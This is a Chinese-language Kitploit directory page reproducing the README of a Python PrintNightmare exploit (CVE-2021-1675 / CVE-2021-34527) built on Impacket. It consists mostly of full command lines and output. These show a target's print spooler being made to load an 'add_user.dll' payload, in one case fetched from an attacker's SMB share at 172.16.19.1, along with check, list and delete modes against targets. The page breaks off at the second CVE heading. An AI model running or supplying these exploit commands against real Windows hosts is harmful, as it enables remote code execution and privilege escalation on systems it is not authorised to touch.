Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PrintNightmare — Python 实现的 PrintNightmare(CVE-2021-1675 / CVE-2021-34527) | Kitploit
工具/GitHubGitHub/ly4k/printnightmare
权限提升漏洞分析漏洞利用渗透测试Payload 开发权限提升 分类第 19 名
GitHubly4k/printnightmare

PrintNightmare

Python 实现的 PrintNightmare(CVE-2021-1675 / CVE-2021-34527)

查看仓库
21333564年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PrintNightmare

使用标准 Impacket 的 PrintNightmare (CVE-2021-1675 / CVE-2021-34527) Python 实现。

安装

$ pip3 install impacket

用法

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
                         target

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

optional arguments:
  -h, --help            显示此帮助信息并退出
  -debug                开启 DEBUG 输出
  -no-pass              不询问密码(与 -k 一起使用)
  -k                    使用 Kerberos 认证。根据目标参数从 ccache 文件 (KRB5CCNAME) 获取凭据。如果找不到有效凭据,则使用命令行中指定的凭据
  -dc-ip ip address     域控制器的 IP 地址。如果省略,将使用目标参数中指定的域部分 (FQDN)

connection:
  -port [destination port]
                        连接到 MS-RPRN 命名管道的目标端口
  -target-ip ip address
                        目标机器的 IP 地址。如果省略,将使用 target 参数中指定的内容。当目标为 NetBIOS 名称且无法解析时,此选项很有用

authentication:
  -hashes LMHASH:NTHASH
                        NTLM 哈希,格式为 LMHASH:NTHASH

driver:
  -name driver name     驱动程序名称
  -env driver name      驱动程序环境
  -path driver path     驱动程序路径
  -dll driver dll       DLL 路径

modes:
  -check                检查目标是否存在漏洞
  -list                 列出现有的打印机驱动程序
  -delete               删除打印机驱动程序

示例

漏洞利用

远程 DLL
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 枚举打印机驱动程序
[*] 驱动程序名称: 'Microsoft XPS Document Writer v5'
[*] 驱动程序路径: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL 路径: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] 复制 DLL
[*] 成功复制 DLL
[*] 尝试加载 DLL
[*] 成功加载 DLL
本地 DLL
$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 枚举打印机驱动程序
[*] 驱动程序名称: 'Microsoft XPS Document Writer v5'
[*] 驱动程序路径: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL 路径: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
[*] 加载 DLL
[*] 成功加载 DLL

注意,本地 DLL 示例并未利用 CVE-2021-34527 来复制 DLL。

自定义名称
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 枚举打印机驱动程序
[*] 驱动程序名称: 'My Printer Driver'
[*] 驱动程序路径: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL 路径: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] 复制 DLL
[*] 成功复制 DLL
[*] 尝试加载 DLL
[*] 成功加载 DLL

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 枚举打印机驱动程序
名称:               Microsoft XPS Document Writer v4
环境:                 Windows x64
驱动程序路径:         C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
数据文件:             C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
配置文件:             C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
版本:                 4
----------------------------------------------------------------
名称:               Microsoft Print To PDF
环境:                 Windows x64
驱动程序路径:         C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
数据文件:             C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
配置文件:             C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
版本:                 4
----------------------------------------------------------------
名称:               My Printer Driver
环境:                 Windows x64
驱动程序路径:         C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
数据文件:             C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
配置文件:             C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
版本:                 3
----------------------------------------------------------------
名称:               Microsoft Shared Fax Driver
环境:                 Windows x64
驱动程序路径:         C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
数据文件:             C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
配置文件:             C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
版本:                 3
----------------------------------------------------------------
名称:               Microsoft enhanced Point and Print compatibility driver
环境:                 Windows x64
驱动程序路径:         C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
数据文件:             C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
配置文件:             C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
版本:                 3
----------------------------------------------------------------

检查目标是否存在漏洞

未打补丁的 Windows 10
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 目标似乎存在漏洞!
已打补丁的 Windows Server 2022
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[!] 目标似乎不存在漏洞

列出当前打印机驱动程序

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 枚举打印机驱动程序
名称:               Microsoft XPS Document Writer v4
环境:                 Windows x64
驱动程序路径:         C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
数据文件:             C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
配置文件:             C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
版本:                 4
----------------------------------------------------------------
名称:               Microsoft Print To PDF
环境:                 Windows x64
驱动程序路径:         C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
数据文件:             C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
配置文件:             C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
版本:                 4
----------------------------------------------------------------
名称:               Microsoft enhanced Point and Print compatibility driver
环境:                 Windows x64
驱动程序路径:         C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
数据文件:             C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
配置文件:             C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
版本:                 3
----------------------------------------------------------------

删除打印机驱动程序

可能需要管理员权限。

$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] 已删除打印机驱动程序!

详细信息

PrintNightmare 包含两个 CVE:CVE-2021-1675 / CVE-2021-34527。

CVE-2021-1675

允许非管理员用户添加新的打印机驱动程序。该漏洞已通过仅允许管理员添加新打印机驱动程序来修复。已打补丁的打印后台处理程序在非管理员尝试添加新打印机驱动程序时会返回 RPC_E_ACCESS_DENIED(代码:0x8001011b)。

CVE-2021-34527

下载工具